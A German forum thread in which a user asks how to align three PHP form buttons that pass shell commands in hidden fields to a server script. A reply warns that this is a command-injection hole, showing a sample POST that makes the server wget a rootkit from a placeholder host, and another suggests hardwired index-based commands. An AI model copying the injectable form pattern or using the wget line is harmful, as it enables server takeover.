3 Buttons nebeneinander

Bash, Shell, PHP, Python, Perl, CGI
in flames
Posts: 70
Joined: 2003-12-24 22:33

3 Buttons nebeneinander

Post by in flames »

Hallo,

so nächste und hoffentlich letzte Frage :wink:

Code: Select all

<form name="myform" action="<?php echo $PHP_SELF ?>" method="post">

<input type="hidden" name="command" value="/srv/start.sh start">
<input type="hidden" name="stderr" value="checked">
<input class=input name="submit_btn" type="submit" value="MOH:SP Server Start">
</form>


<form name="myform" action="<?php echo $PHP_SELF ?>" method="post">

<input type="hidden" name="command" value="/srv/start.sh stop">
<input type="hidden" name="stderr" value="checked">
<input class=input name="submit_btn" type="submit" value="MOH:SP Server Stop">
</form>

<form name="myform" action="<?php echo $PHP_SELF ?>" method="post">

<input type="hidden" name="command" value="/srv/start.sh restart">
<input type="hidden" name="stderr" value="checked">
<input class=input name="submit_btn" type="submit" value="MOH:SP Server Restart"></p>
</form>
Das sind wie man sehen kann drei Button durch den </form> Befehl plazieren die sich aber automatisch untereinander, ich hätte die aber gerne alle nebeneinander...durch entfernen von </form> hab ich sie zwar nebeneinander allerdings sind sie dann nicht mehr ausführbar.

Wie könnte ich das lösen?

Vielen Dank
ahoi
Posts: 20
Joined: 2004-02-12 21:31

Re: 3 Buttons nebeneinander

Post by ahoi »

wie wärs mit ner tabelle?
henock
Posts: 17
Joined: 2002-07-12 15:11

Re: 3 Buttons nebeneinander

Post by henock »

Bzgl. der Ausrichtung scließe ich mich meinem Vorredner an, pack die Buttons einfach in die Zellen einer Tabelle.

Du solltest dir darüber im Klaren sein, dass dein Formular bzw. die damit verbundenen Skripte ein herbes Sicherheitsproblem darstellen. Bitte niemals Shell-Befehle direkt per Webformular übergeben und dann einfach mittels Skript ausführen. Das ist gaaaanz böse. Ein unangenehmer Zeitgenosse könnte sich die Seite anschauen und dann einfach einen HTTP-Post Request mit einem Inhalt ála

Code: Select all

command="/usr/bin/wget http://PFAD.ZUM/Rootkit.tgz
submit_btn="MOH:SP Server Start"
schicken und dein Server würde sich nun ein Loch in den Bauch freuen und das Rootkit ziehen. Das kompilieren könnte man dann nach gelichem Schema durchziehen ....

Ich gehe zwar davon aus, dass das Interface mittels .htaccess geschützt ist, aber ich würde obigen Sachverhalt trotzdem ändern. Erstens kommt es anders, und zweitens als man denkt ....

Du könntest ja z.B.: die verschiedenen Aktionen (Start/Stop/Restart) mit Indexnummern benennen und dann dein Shellskript anhand der Indexnummer "hardverdrahtet" auf dem Server starten.
in flames
Posts: 70
Joined: 2003-12-24 22:33

Re: 3 Buttons nebeneinander

Post by in flames »

Ã?ber sowas hab ich ja garnicht nachgedacht :oops:

Nun das ist schon per htaccess geschützt und die Seite kennen auch nur 5 Leute, aber wenn das wirklich so gefährlich ist muss ja da wohl was machen, ich hatte das vorher über Webmin gemacht, ebenfalls mit diesem script aber eben mir Webmin ausgeführt
Du könntest ja z.B.: die verschiedenen Aktionen (Start/Stop/Restart) mit Indexnummern benennen und dann dein Shellskript anhand der Indexnummer "hardverdrahtet" auf dem Server starten.
Ich denke nur das ich sowas nicht gebacken bekomme, kann ich mich da irgendwie einlesen wie das durchziehen könnte?

Vielen Dank
oxygen
Posts: 2138
Joined: 2002-12-15 00:10
Location: Bergheim

Re: 3 Buttons nebeneinander

Post by oxygen »

Das ist sogar einfacher als dein Teil, statt:

Code: Select all

 <input type="hidden" name="command" value="/srv/start.sh restart"> 
einfach

Code: Select all

 <input type="hidden" name="command" value="0"> 
dann im php Script:

Code: Select all

 switch ($_POST['command']) {
   case 0:
       exec("srv/start.sh start"); break;
   case 1:
       exec("srv/start.sh stop"); break;
   case 2:
       exec("srv/start.sh restart"); break;
}
Oder wie das auch immer verarbeitet werden soll...